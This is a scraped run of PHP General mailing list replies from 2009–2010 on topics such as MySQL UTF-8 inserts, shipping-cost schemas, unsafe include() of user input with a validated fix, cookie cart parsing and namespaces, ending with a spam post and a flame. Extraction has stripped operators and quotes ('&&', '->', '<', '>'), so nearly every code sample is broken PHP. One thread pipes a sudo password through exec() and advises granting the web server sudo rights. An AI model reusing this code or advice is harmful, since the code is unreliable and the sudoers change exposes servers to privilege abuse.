Op 1/22/10 5:19 PM, Richard Quadling schreef: 2010/1/22 Jochem Maas joc...@iamjochem.com: constants in interfaces are not meant for this. a class constant doesn't constitute an interface. I believe constants in interfaces are allowed purely because it is helpful to have them defined outside of the global space and somewhere where all implementors of said interface can realiably reference them. Yep. I would suggest you need to define some extra methods in your interface e.g. function getKillNotes(); function getKillTypeFlag(); The other option would be to be able to _easily_ detect the presence of a class constant. Without an error. Fatal or otherwise. $rfClass = ReflecionClass('KilledClass'); if (in_array('KILL_SWITCH_NOTES', $rfClass-getConstants())) { ...} seems the only way. You can't use getConstant('KILL_SWITCH_NOTES') as False is returned for failure with no differentiation for a False value. Grrr. defined() ??? besides you can cache the reflection results - and maybe you only need the reflection stuff when code is in development mode, I'm assuming your using it to detect coding/developer errors. Thanks to you all for the discussion. Regards, Richard. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Foreign Characters Break in MySQL
Op 1/22/10 5:18 PM, Ashley Sheridan schreef: ... You'd be surprised how many people still use a dumb browser! well, no not really - but then we're in the same business :) I wasn't discounting the use of the encoding META tag, just pointing out that it's a hack we have to use (and that we should be using it in addition to setting proper encoding HTTP headers) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Foreign Characters Break in MySQL
Op 1/22/10 2:28 AM, Ryan Park schreef: Forgot to reply all. You can see that it's in the middle of the sql statement. It looks fine here but some how it breaks during the query. ?php mysql_connect(localhost, adminID, password) or die(mysql_error()); echo Connected to MySQLbr /; mysql_select_db(databasename) or die(mysql_error()); echo Connected to Databasebr /; $sql = INSERT INTO xe_modules (module_srl, module, module_category_srl, layout_srl, menu_srl, site_srl, mid, skin, browser_title, description, is_default, content, open_rss, header_text, footer_text, regdate) VALUES ('135', 'bodex', '0', '53', '0', '0', 'free', 'xe_default', '자유게시판 ', '', 'N', '', 'Y', '', '', UNIX_TIMESTAMP());; you need to: 1. have some understanding of char encoding and character sets. 2. define you DB[tables] to use a collation that supports the stuff you want to enter. 3. you need to connect to the DB with a suitable charset (google 'SET NAMES') 4. you need to make sure the data you are putting into your queries is in that same charset. basically you need UTF8 - be prepared for some pain and a lot of reading in order to get to grips with these concepts, I've personally found that encoding, charsets et al are not the easiest things to one's head round. mysql_query($sql) or die(mysql_error()); mysql_close(); ? On 1/21/2010 5:19 PM, Jim Lucas wrote: Ryan Park wrote: Hello I'm currently trying to use PHP to insert foreign characters into one of the mysql database tables.mysql_query() worked seamlessly, but when I check the inserted data on phpMyAdmin it shows the foreign characters in broken letters, like this ì‹œíŒ- jibberish...The foreign characters show fine when I'm typing it out on my editor to code PHP, but it gets broken into unrecognizable symbols when put into mysql database columns. I tried to create the same thing this time through phpMyAdmin console and it worked great, the foreign characters showed correctly as they should.The column that I'm trying to put the foreign characters into is set as utf8_general_ci.I wish to use PHP to insert the data into the database because I'll be inserting massive amounts of them at once, so I just can't continue with this problem at hand. I'll greatly appreciate any help, thank you. _ Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. http://clk.atdmt.com/GBL/go/196390709/direct/01/ How about showing a little of the insert code. ie: how you are gathering the data, how you are preping the data, and the actual insert statement. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] integrating shipping with shopping cart site - OT
Op 1/18/10 10:47 AM, Angelo Zanetti schreef: Hi all, We are about to start a new project. Custom written shopping cart - quite simple actually. However we have a concern when it comes to calculating the shipping cost for an order. For each product we can determine the base cost based on weight, therefore we can determine the total weight of an order. However we are struggling to determine how to calculate the shipping based on where the delivery is going. In terms of DB and PHP would the best way to calculate it be done by having a list of countries to ship to and a rate for each? Then you can apply the rate to the current order (calculate according to the order weight). Problems arise when shipping to different parts of a country EG: New York vs California (quite far apart). Perhaps we should have a list of cities but that could be massive? I know there is a PHP class / system that integrates with UPS but I don't think the client is going to use UPS. Perhaps you can tell me how you have handled this issue in the past. Apologies if it is slightly off topic but it does still relate to PHP indirectly. I'd start with defining shippingcost 'sets', each defining a number of costs by weight bands, some 'table defs': set: - id name set_bands: -- set_id upper_weightcost then it would be a case of linking (many-to-many relation) 'regions' to sets, if you approach this with a tree of regions you can effectively set values at a continent, country, state/province level ... as such you would only need to relate a 'shippingcostset' to a state if the shippingcosts are different to the given country's shippingcosts. world - north america - california - south america - europe - france - UK then your left with the problem of determining the smallest defined region a given address physically falls into .. using geo-spatial magic in the DB would be one way to do it. this is a hard problem (unless, maybe, the client is willing to sacrifice precision and instead using highly averaged shipping cost definitions to cover the real differences in costs - i.e. a fixed fee for all of europe, whereby such fee is just above the average real cost the client pays for shipping). my guess would be that building such a thing is hard, and would take lots of time ... best bet is to hook into the webservice of whatever shipping company the client intends to use ... even if you have to build your end of the webservice from scratch it will be many factors less hard that building a user-manageable, shipping cost algorythm. - sorry it's all a bit vague, I'm very tired :) my eyes are starting to bleed. Thanks in advance. Angelo http://www.wapit.co.za http://www.elemental.co.za -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] POLL: To add the final ? or not...
Op 1/14/10 11:37 PM, Kim Madsen schreef: Ashley Sheridan wrote on 14/01/2010 23:30: What is the difference between: ? print hello PHPeople; ?WHITESPACE and ? print hello PHPeople; WHITESPACE Same shit when I look at it, a sloppy developer is what it is :-) -- Kind regards Kim Emax - masterminds.dk Plenty of differences, if you include the first one as a file, the whitespace gets sent to the browser because it is not part of the PHP, and so is assumed to be HTML. Once this happens, the headers have been sent, so you can't use different headers in your script. Hmm... you could be right. I guess I just never made that mistake :-) could be right? that implies you don't know and didn't bother to test it. I'd postulate that is sloppy. In another post you mention your reliance on your favorite editor - relying blindly on your editor to 'do the right thing' could also be considered sloppy (no tool is perfect all of the time). pretty much every php dev has run into the issue of header() calls failing due to whitespace, it's almost a rite of passage - I'd only call it a mistake if you don't bother to test your code to the extent that you actually get into a situation that you put something so obviously broken into a production env. you mention that you guess as to whether you made the mistake in question, obviously a an off the cuff remark and no worth tripping over in it's own right but it does raise an interest point, namely that only sloppy devs are satified with guess work, diligent devs either know or they don't and when they don't they take the time to research and test until they feel confident to say that they do know - rather esoteric, probably not very pragmatic, but there you have it nonetheless. you offer to different pieces of pseudo-code and call them 'the same shit when you look at it' - again there's an argument to say that's sloppy (in terms of reading code) considering they are not identical in source nor resultant output. ... same shit, different day ... or to put it another way, be very careful what you post on a techie mailing list - you never know when some pendantic SOB is going to rip you another 'one' in reply ;-). -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Display just 1 record in a query
Op 1/13/10 12:43 AM, Robert Cummings schreef: deal...@gmail.com wrote: On Jan 12, 2010, at 1:57 PM, Ashley Sheridan wrote: Depends on how you're creating running the query. You could do something like: echo mysql_result($result, 1, 'fieldname'); Where $result is your result object and 1 is a 0 indexed array, so would be the second result. Thanks Ryan, Ashley Kim for the good techniques... - in my case I was trying to pull a random record from a query of Table1 - then do a 2nd query from 1st so mysql_result worked fine for my needs like: ... do query 1... 'cur' - SELECT id FROM myTable1 $ran = rand(0, $totalRows_cur - 1); // pick random rec row within total count $pick1 = mysql_result($cur, $ran); // get the ID from the choice - (like id=252) ... do query 2 // where relatedID = $pick1 of myTable2 Put your random logic into the query: SELECT something FROM somewhere WHERE condition ORDER BY RAND() LIMIT 1 please read the following to understand the consequences and possible performance problems with this approach: http://www.titov.net/2005/09/21/do-not-use-order-by-rand-or-how-to-get-random-rows-from-table/ personally I go with the 2 query approach ... or even to use a specific field to store a generated random value (with suitable index) for each record, the stored values can be regenerated in an out-of-band process (e.g. cron job) ... such a setup would suffice in situations where frontend response speed is of primary concern and it's acceptable to return the same 'random' record over a given period (i.e. the time between random value regeneration) Cheers, Rob. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] trying to launch kate from the browser....
Op 1/8/10 1:41 PM, Rene Veerman schreef: I'm working on a better var_dump (http://mediabeez.ws/htmlMicroscope/, LGPL), and want to launch my kate editor when i click in the browser on a line in my trace-log. I'm trying to exec() this line, but it returns 1 (which is i believe a general error) echo hhh | sudo -u rene -S /bin/sh -c export HOME=/home/rene/ kate -l 21 -u /media/500gb/data2/www/htdocs/naaah/maintenance/maintenanceLogic.php if i open a terminal, do sudo su www-data and then execute the line above, then kate actually jumps to the right file, or opens it, etc. but from the browser, it won't work. exec($str,$o,$r); $r===1. i could use some help here.. seems everyone has the wrong idea about what your trying to do. it is possible, given that your webserver and your browser are running on the machine - if the webserver manages to start Kate up then you'll see the editor on your screen. the only problem you *seem* to have is the fact that your webserver doesn't have the ness. permissions to run the exec command (I'd guess it's specifically related to the fact that the user apache runs as doesn't have the perms to run sudo, at least not in the context of your user account) ... try fudging your sudoers file to give the user your apache instance runs as the perms to run 'sudo kate' as you ... then restart apache (just in case) and see what happens. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] mysterious include problem
Ashley Sheridan schreef: On Tue, 2009-12-08 at 17:32 +0100, Jochem Maas wrote: Hi Allen, gonna be a bit ruthless with you :). 1. your not filtering your input (your open to include being hacked) 2. your not validating or error checking (e.g. does the include file exist??) 3. keeping large numbers of content pages with numerical filenames is a maintenance nightmare and incidentally not very SEO friendly 4. your not doing much debugging (I guess) - try using var_dump(), echo, print_r(), etc all over your code to figure out what it's doing (e.g. var_dump($_GET, $_POST) and print(HELLO - I THINK \$_GET['page'] is set.)) personally I never rely on relative paths - I always have the app determine a full path to the application root (either at install/update or at the beginning of a request) also I would suggest you use 1 include file for all your scripts (rather than per dir) ... copy/past code sucks (read up on the DRY principe). additionally look into FrontController patterns and the possibility to stuff all that content into a database which gives all sorts of opportunities for management/editing. ?php $page= isset($_GET['page']) strlen($_GET['page']) ? basename($_GET['page']) : null ; if (!$page || !preg_match('#^[a-z0-9]+$#i', $page)) $page = 'default'; $file = dirname(__FILE__) . '/content/' . $page . '.inc'; if (!file_exists($file) || !is_readable($file)) { error_log('Hack attempt? page = '.$page.', file = '.$file); header('Status: 404'); exit; } // echo header include $file; // echo header ? maybe I've bombarded you with unfamiliar concepts, functions and/or syntax. if so please take time to look it all up ... and then come back with questions :) have fun. Allen McCabe schreef: I have been using includes for my content for a while now with no problems. Suddenly it has stopped working, and it may or may not be from some changes I made in my code structure. I use default.php for most or all of my pages within a given directory, changing the content via page numbers in the query string. So on default.php, I have the following code: ?php if(isset($_GET['page'])) { $thispage = $_GET['page']; $content = 'content/'.$_GET['page'].'.inc'; } else { $thispage = default; $content = 'content/default.inc'; } ? html, body, div etc. ?php include($content); ? I have a content subdirectory where I store all the pages with files such as default.inc, 101.inc, 102.inc, etc. As I said, this has been working fine up until now, if I use the url user/default.php or just user/ I get this error: *Warning*: include(content/.inc) [function.includehttp://lpacmarketing.hostzi.com/user/function.include]: failed to open stream: No such file or directory in * /home/a9066165/public_html/user/default.php* on line *89* AND *Warning*: include() [function.includehttp://lpacmarketing.hostzi.com/user/function.include]: Failed opening 'content/.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in * /home/a9066165/public_html/user/default.php* on line *89* But if I use user/default.php?page=default I get the correct content. It's acting as if page is set, but set to NULL, and then trying to find an include at path content/.inc what's going on?? The SEO factor here is only minor. Very little weight is given to the filename of a page, much more is given to the content and the way it is marked up. 'friendly' - i.e. humanreadable URLs are ++ with regard to SEO, I only know it has impact on real estate sites. Thanks, Ash http://www.ashleysheridan.co.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] I have not seen any messages for a couple of days...
Ashley Sheridan schreef: On Thu, 2009-12-10 at 11:26 -0500, Robert Cummings wrote: tedd wrote: At 10:29 AM -0500 12/10/09, Robert Cummings wrote: No, it's been broken for days. You won't get any emails for at least another week. What's been broken? I've been receiving [PHP] post everyday. Nothing is broken... it was a joke. How could it be broken if you receive my response... ;) Cheers, Rob. -- http://www.interjinn.com Application and Templating Framework for PHP Telepathic email servers? I've heard they're becoming more popular these days. no, your confused with that other list php-psychics. :-) (STA) Thanks, Ash http://www.ashleysheridan.co.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] cookies and carts
Allen McCabe schreef: I have a shopping cart type system set up which keeps track of the cart contents using a SESSION variable, where $_SESSION['cart'][$item_id'] is equal to the quantity, so the name/value pair is all the information I need. But sessions are unreliable on the free server I am currently using for this website (not my choice), so I had start using cookies because users were being sporadically logged out, sometimes just on a page refresh. I want to find a way to set a cookie to remember the cart items as well, and I thought setting a cookie for each item/quantity pair was the way to go until I started trying to figure out how to unset all those cookies if the user empties their cart. Is there any way to set cookies with an array for the name? Intead of $_COOKIE['item_number'] have $_COOKIE['cart']['item_number'] like I have the SESSION? 1. use one cookie for this (and other data) 2. DO NOT USE serialize()/unserialize() to pack/extract the data using unserialize() opens you up to alsorts of potential hacks (IMHO), keep the data structure simple and revalidate it's entire contents everytime you read it in (assuming your article ids are INTs, all the data should be [valid] INTs - anything else and the cookie should be deleted). here is some code to play with: (written directly in my email client, no garantees is parses or works as is) ?php function buildCookieCartStr(array $data) { $out = array(); foreach ($data as $artId = $quant) $out[] = $artId.':'.$quant; return join('|', $out); } function parseCookieCartStr($s) { $data = array(); $items = explode('|', $s); if (!is_array($items)) return killCookieCart(); if (count($items)) foreach ($items as $item) { $item = explode(':', $item); if (is_array($item) || count($item) !== 2) return killCookieCart(); foreach ($item as $v) if (!$v || ($v != (int)$v)) return killCookieCart(); if (!isValidArtId($item[0]) || ($item[1] 1) return killCookieCart(); if (isset($data[ $item[0] ])) return killCookieCart(); $data[ $item[0] ] = $item[1]; } return $data; } function killCookieCart() { // TODO: delete cookie } function isValidArtId($id) { return true; // TODO: valid article id } ? you can secure your code further by using the filter extension in combination with a regexp filter in order to retrieve the cookie data from the request, here's a regexp that matches only non empty strings with digit, colon and pipe chars: #^[\d:\|]+$# PS - hello again list. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] mysterious include problem
Hi Allen, gonna be a bit ruthless with you :). 1. your not filtering your input (your open to include being hacked) 2. your not validating or error checking (e.g. does the include file exist??) 3. keeping large numbers of content pages with numerical filenames is a maintenance nightmare and incidentally not very SEO friendly 4. your not doing much debugging (I guess) - try using var_dump(), echo, print_r(), etc all over your code to figure out what it's doing (e.g. var_dump($_GET, $_POST) and print(HELLO - I THINK \$_GET['page'] is set.)) personally I never rely on relative paths - I always have the app determine a full path to the application root (either at install/update or at the beginning of a request) also I would suggest you use 1 include file for all your scripts (rather than per dir) ... copy/past code sucks (read up on the DRY principe). additionally look into FrontController patterns and the possibility to stuff all that content into a database which gives all sorts of opportunities for management/editing. ?php $page = isset($_GET['page']) strlen($_GET['page']) ? basename($_GET['page']) : null ; if (!$page || !preg_match('#^[a-z0-9]+$#i', $page)) $page = 'default'; $file = dirname(__FILE__) . '/content/' . $page . '.inc'; if (!file_exists($file) || !is_readable($file)) { error_log('Hack attempt? page = '.$page.', file = '.$file); header('Status: 404'); exit; } // echo header include $file; // echo header ? maybe I've bombarded you with unfamiliar concepts, functions and/or syntax. if so please take time to look it all up ... and then come back with questions :) have fun. Allen McCabe schreef: I have been using includes for my content for a while now with no problems. Suddenly it has stopped working, and it may or may not be from some changes I made in my code structure. I use default.php for most or all of my pages within a given directory, changing the content via page numbers in the query string. So on default.php, I have the following code: ?php if(isset($_GET['page'])) { $thispage = $_GET['page']; $content = 'content/'.$_GET['page'].'.inc'; } else { $thispage = default; $content = 'content/default.inc'; } ? html, body, div etc. ?php include($content); ? I have a content subdirectory where I store all the pages with files such as default.inc, 101.inc, 102.inc, etc. As I said, this has been working fine up until now, if I use the url user/default.php or just user/ I get this error: *Warning*: include(content/.inc) [function.includehttp://lpacmarketing.hostzi.com/user/function.include]: failed to open stream: No such file or directory in * /home/a9066165/public_html/user/default.php* on line *89* AND *Warning*: include() [function.includehttp://lpacmarketing.hostzi.com/user/function.include]: Failed opening 'content/.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in * /home/a9066165/public_html/user/default.php* on line *89* But if I use user/default.php?page=default I get the correct content. It's acting as if page is set, but set to NULL, and then trying to find an include at path content/.inc what's going on?? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Regex
jesse.ha...@arvatousa.com schreef: Hi, Brand new to regex. So I have a cli which runs a regex on users input, to make sure that only 0-9 and A-Z are accepted. It should strip everything else. My problem is that when you press control-Z (on Windows; I have not yet tested this on linux, and I will, but I would like this to be compatible with both OS's) it loops infinitely saying invalid data (because of the next method call, which decides what to do based on your input). So, here is the input code. Is there a way I can ensure that control commands are stripped, here? there is, your control-Z is not a Z at all, and it's only printed as ^Z so you can see it ... it's actually a non-printing char. try this regexp for stripping control chars: /[\x00-\x1f]+/ public function getSelection() { $choice = $this-validateChoice(trim(strtoupper(fgets(STDIN; return $choice; } private function validateChoice($choice) { $choice = ereg_replace(/[^0-9A-Z]/,,$choice); return $choice; } I have tried a ton of different things to try and fix this. Tried /\c.|[^0-9A-Z]/, and many variations of \c and the [^0-9A-Z], to no avail. I also tried using both preg_replace() as well as ereg_replace(). I spent a lot of time on the regex section of the PHP manual, but I am not finding anything. Any advise on how to accomplish this? Thanks, Jesse Hazen -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Namespce operator
Luke schreef: Backslash doesn't sound like it will look very pretty 2009/3/25 Richard Heyes rich...@php.net Backslash? Seriously? I'm hurt that my suggestion of ¬ (ASCII170 ?) wasn't used. :-( please kill this thread, the namespace operator was heavily discussed multiple times in the last 1-2 years on the internals mailing list. the decision was made a long, long time ago. if you don't track what's going on with regard to language development then you have to just lump it ... and if you do track what's going on and you didn't agree with the arguments and/or decision you also have to lump it. -- Richard Heyes HTML5 Canvas graphing for Firefox, Chrome, Opera and Safari: http://www.rgraph.net (Updated March 14th) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Namespce operator
Christoph Boget schreef: Backslash? Seriously? I'm hurt that my suggestion of ¬ (ASCII170 ?) wasn't used. :-( Backslash doesn't sound like it will look very pretty Windows and DOS have been getting away with it for the last 25+ years so why can't PHP get in on that action? :P Though I have read the explanation (many, many times) and I still don't understand why '::' wasn't used. MyClass::MyStaticMethod is utilizing namespacing. it's a serious brain hemoraging affair, I had the honour of digging quite deep into this with Greg Beaver ... he proved beyond a shadow of a doubt that there we're serious issues ... and trust me he really delved deep into the problem (and he's way smarter than *most*) we're lucky he put in the work. Why it was felt that '::' as the official namespace operator would mess that up is beyond my ken. :( thnx, Christoph -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Google Summer Of Code : The PHP Project
Daniel Brown schreef: On Mon, Mar 23, 2009 at 05:57, Nabil Khamassi nabil.khama...@ensimag.imag.fr wrote: I am especially interested in Integrated Code Coverage of C and PHP Code because I have a solid knowledge in C language (and a full-time project in C is planned at the end of this semester in ENSIMAG) but also on parsers that I am studying all along this year. Thanks for your message and introduction, Nabil. I've forwarded your message as appropriate and if chosen from the list of candidates, the mentor for that sub-project will be in touch with you very soon. Thanks again, and best of luck. hey Dan, please feel free to update your newly aquired title to: Pretty Helpful Plenipotentiary I feel it's still suitably implies the concept of 'self-importance' ... in case you were worried ;-) have a good day! -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Tripple The Fun
tedd schreef: At 2:02 PM +0100 3/24/09, abdulazeez alugo wrote: Hello guys, The list seems boring to me today so I've come up with an idea (you can call it a challenge). What if we all wrote to this thread in PHP codes. on't get the gist yet? well all it means is that, on this thread, all that we should see must be written in PHP codes and it must be meaningful and relevant to any discussion on ground. The challenge starts. Now! ?php $alugo=Hello guys, anyone up for the challenge?; print $alugo; ? Not much of a challenge. Whenever I'm bored, I read through the php documentation finding functions I never knew existed OR get myself lost in OOP -- both do a good job of putting my bored ass to sleep. :-) ?php class Sperling { function readManual() { /* file_get_contents(http://php.net/docs/manual/en/;); */ } function __sleep() { echo Z.\n; } }; $tedd = new Sperling; $tedd-readManual(); file_put_contents(/path/to/tedds/bed, serialize($tedd)); ? anyways I always figured Rocks[tm] was the first OO language, how much more 'objecty' can you get than a rock :) Cheers, tedd -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] quick question - need a site i can more or less copy from
bruce schreef: Hi... Working on a test app, and I need a web interface to test/view the underlying information. Looking for (hopefully) quick pointers/suggestions. I'm dealing with a number of cli web crawling apps that return data. I'm trying to find a quick app that I can modify the db schema, as well as some of the underlying logic to display my data. my returned data consists of: university school dept class classname classID classdescription classA classB faculty The above is a represenation of the levels of data. I'm looking to have multiple tbls, each of which links to the child tbl... I'm not a web dev, and i'm looking for some sort of web app that i might rip apart/modify so i can start to be able to view this data on a web app.. i'm currently looking through sourceforge/freshmeat/etc... if all you really want is just to view/hack the data at a very raw level, try phpmyadmin (i'm assuming your using mysql) thanks... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] [News] Affordable Independent Web Developer - Search Engine Optimization Services - March 19th, 2009
Ginkga Studio LLC schreef: Today's Date: March 19th, 2009 Hello, I'm a real person sending you this email - this is an initial contact opt-in request for permission to contact you for web development services. WHO I AM AND MY INTENTIONS: I'm an affordable, independent web developer, been in business for about 5 years. Interested in building a new website for you or help you on your current site. you realise you just posted to a list of web developers, right? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Web Development/Application Analysis
tedd schreef: At 11:34 AM +0300 3/20/09, OOzy Pal wrote: Hello, I have just hired a remote PHP programmer. His main job is web development and applications. I have few concerns, I would be happy if someone can point me to the right direction. 1. How can I provide him the requirements. I mean how can I analyze the site and put everything in writing. 2. How can I estimate manhours. Is there a sample web site/application anyalsis. Basically, what is provided to the programmers in order for them to start working? -- OOzy Ubuntu (8.10) OOzy: If you don't know what you want, then why did you hire a programmer? In any event, the first thing you need to do is to pin down what you want the site to do. Do you want it to gather emails, or sell a product, provide a video, sell your company, tap-dance, or what? If you know what you want, then put those objectives in a list of requirements. You don't have to be a programmer to know what you want, but you must be able to effectively communicate those ideas to the programmer so that they can: 1) understand what you want; 2) and can tell you if it's possible and what cost and time. I always tell my clients that If they can describe it, then I can do it -- however, some things can take more money/time than they an afford. In any event, as a client there are some thing that you need to know: http://sperling.com/four-things-clients-should-know.php Once you and the programmer understands the other's position and expectations (i.e., meeting of the minds), then the programmer should be able to determine an approximate number of hours and overall cost for the project. Here's another thing you must realize -- as the client you can choose: Quality; Time; Or Cost as your main concerns, but only two of them -- not all three. For example, if you want it done quick with high quality, then it's going to cost you. If you want high quality and low cost, then it's going to take a while. And if you want it done quick with low cost, then expect low quality -- and at that point, a respectable programmer would normally pass on the project -- professionals don't turn out crap. speak for yourself ;-) seriously though, good points. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] [News] Affordable Independent Web Developer - Search Engine Optimization Services - March 19th, 2009
George Larson schreef: Not only that but, judging from the phone number, Samantha cleans also cleans houses: http://betterthancleanmaidandmaintenanceservices.com/choose-us/contact-us-mainmenu-3/12-contacts/1-name.h what a busy girl :-) On Fri, Mar 20, 2009 at 10:57 AM, Jochem Maas joc...@iamjochem.com mailto:joc...@iamjochem.com wrote: Ginkga Studio LLC schreef: Today's Date: March 19th, 2009 Hello, I'm a real person sending you this email - this is an initial contact opt-in request for permission to contact you for web development services. WHO I AM AND MY INTENTIONS: I'm an affordable, independent web developer, been in business for about 5 years. Interested in building a new website for you or help you on your current site. you realise you just posted to a list of web developers, right? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] dynamicaly append method to class - workaround for aggregate_methods()
Karel Kozlik schreef: Hello, thanks for the hint. It looks nice. Where could I learn more about $class::$method() syntax? I was not successfull when searching in php manual. er, dunno - I picked it up on the internals mailing list I think, you might wnat to search that. Btw. is it an intended behaviour that $class::$method() works in this way? I mean that I would pressume that method is called in static context and the $this should not be avaiable in the method than. So I affraid a bit that the behaviour will be changed in the (near) future. this is intentional, it isn't going to change ... yes it is weird, we had a thread about this issue before not long ago on this list where someone thought it was a bug (I concurred until I was corrected). But there still remains two issues: 1. How to pass arguments to method? The number of arguments is different for each method. So is the only way to construct a string containing the arguments and use eval()? Or is there an another way? then use call_user_func() and/or call_user_func_array() inside __call(), although given the seemingly 'broken' (mho) design and infinite variations that are possible in terms of method argument invocation you might consider tackling the whole system from a wider perspective (probably not what you want to hear I guess) also see: http://bugs.php.net/bug.php?id=40694 basically the by-ref issue is not, seemingly, really solvable - I'd say using by-ref in most cases is unwarranted anyway ... but, you may be able to work round it by using a static variable inconjunction with a, second, retrieval method in the decorating classes that overcome the requirement for by-ref ... if that makes sense. looks like you have your work cut out for you! 2. Arguments sometimes need to be passed by reference. It seems that __call() does not support passing arguments by reference :(. So I have not idea how workaround it. thanks, Karel Jochem Maas napsal(a): Karel Kozlik schreef: Hello list! I am using in my application dynamic method appending to class with aggregate_methods() function. But this function is no more aviable in php5 and runkit extension seems not to be maintained any more. So I would like to replace it with something more common (__call method or so). Just to describe the situation (simplified). There is one common class containing some common functions: class DataLayer{ function add_method($method){ aggregate_methods($this, DataLayer_.$method); } function common_funct_foo(){ ... } function common_funct_bar(){ ... } } And there is hundreds of data manipulation methods (defined within separate classes) which could call common functions. E.g.: class DataLayer_get_items{ function get_items(){ $this-common_funct_foo(); return something; } } And they could also call other dynamicaly added methods: class DataLayer_update_attr{ function update_attr(){ $this-get_items(); $this-common_funct_bar(); return; } } All the stuff is used e.g. in this way: $data = new DataLayer(); $data-add_method('get_items'); $data-add_method('update_attr'); $data-update_attr(); Now the question is whether is it possible to somehow replace functionality of add_method() without aggregate_methods() or runkit_class_adopt(). And _WITHOUT_ need to change the hundreds of DataLayer_* classes. The change should be only in the main DataLayer class. I was thinking about __call() method, but I do not know how to deal with the $this in dynamicaly appended functions. I need somehow make to $this in these functions reference to instance of DataLayer class. __call() will allow you to do this, although you will need php5.3: ?php class DataLayer_update_attr { function update_attr() { echo __METHOD__, \n; $this-common_funct_bar(); $this-get_items(); return; } } class DataLayer { function common_funct_foo() { echo __METHOD__, \n; /* ... */ } function common_funct_bar() { echo __METHOD__, \n; /* ... */ } function __call($method, $args) { $class = DataLayer_{$method}; echo __METHOD__, ... trying {$class}::{$method}()\n; if (!class_exists($class, true)) // trigger autoload throw new Exception(buddy we don't have a $class, so $method is not callable); $class::$method(); } } $d = new DataLayer; $d-update_attr(); ? - output -- [22:11:16] jochem::~/test ~/src/php5.3-200808312030/sapi/cli/php -n -f ./class_agg.php DataLayer::__call ... trying DataLayer_update_attr::update_attr() DataLayer_update_attr::update_attr DataLayer::common_funct_bar DataLayer::__call ... trying DataLayer_get_items::get_items() Fatal error: Uncaught exception 'Exception' with message 'buddy we don't have a DataLayer_get_items, so get_items
Re: [PHP] [News] Affordable Independent Web Developer - Search Engine Optimization Services - March 19th, 2009
Arno Kuhl schreef: Sounds like a good deal - clean your home and develop your home page all-in-one. A sailor friend once told me about all-in-one services he got when he stopped for shore leave in Bangkok - also sounded like a good deal, though I don't think it included web development. Experienced sailors pre-booked appointments with the ship's medic before going ashore so they could be seen first when they got back. I wonder if there's something similar with Samantha? Might be a good business: Web Medics. Pre-book an appointment with us before jumping into your web project - we'll fix it afterwards. php-general, surgeon-general :) -Original Message- From: George Larson [mailto:george.g.lar...@gmail.com] Sent: 20 March 2009 05:01 PM To: Jochem Maas Cc: Ginkga Studio LLC; Php-general Subject: Re: [PHP] [News] Affordable Independent Web Developer - Search Engine Optimization Services - March 19th, 2009 Not only that but, judging from the phone number, Samantha cleans also cleans houses: http://betterthancleanmaidandmaintenanceservices.com/choose-us/contact-us-ma inmenu-3/12-contacts/1-name.html On Fri, Mar 20, 2009 at 10:57 AM, Jochem Maas joc...@iamjochem.com wrote: Ginkga Studio LLC schreef: Today's Date: March 19th, 2009 Hello, I'm a real person sending you this email - this is an initial contact opt-in request for permission to contact you for web development services. WHO I AM AND MY INTENTIONS: I'm an affordable, independent web developer, been in business for about 5 years. Interested in building a new website for you or help you on your current site. you realise you just posted to a list of web developers, right? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] [JUNK] .......
Ginkga Studio, LLC schreef: As a matter of fact DANIEL ...I AM A REAL PERSON ! You know, I really hate it that people like YOU reply back to me with your self-vain - self-important attitudes - and act like no one else on the F-ing planet has the right to live or even share the same air you breath YOU DANIEL are NOT that great! You are NO BETTER than me or anyone else here. oh actually he is. he's inadvertently trained more web-developers than you've even met ... most likely, and all for free. funnny thing is with places like (tech mailinglist) this work on a kind of merit basis. Dan's earned his brownie points and people around hear appreciate him, we don't know who the frak you are ... so guess what your reply does for you your business funnier thing is you posted unsolicited business spam hawking web-development/design to a mailing list full web-developers ... that like selling ice to eskimoes ... they'll either laugh at you or ignore you. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] [JUNK] .......
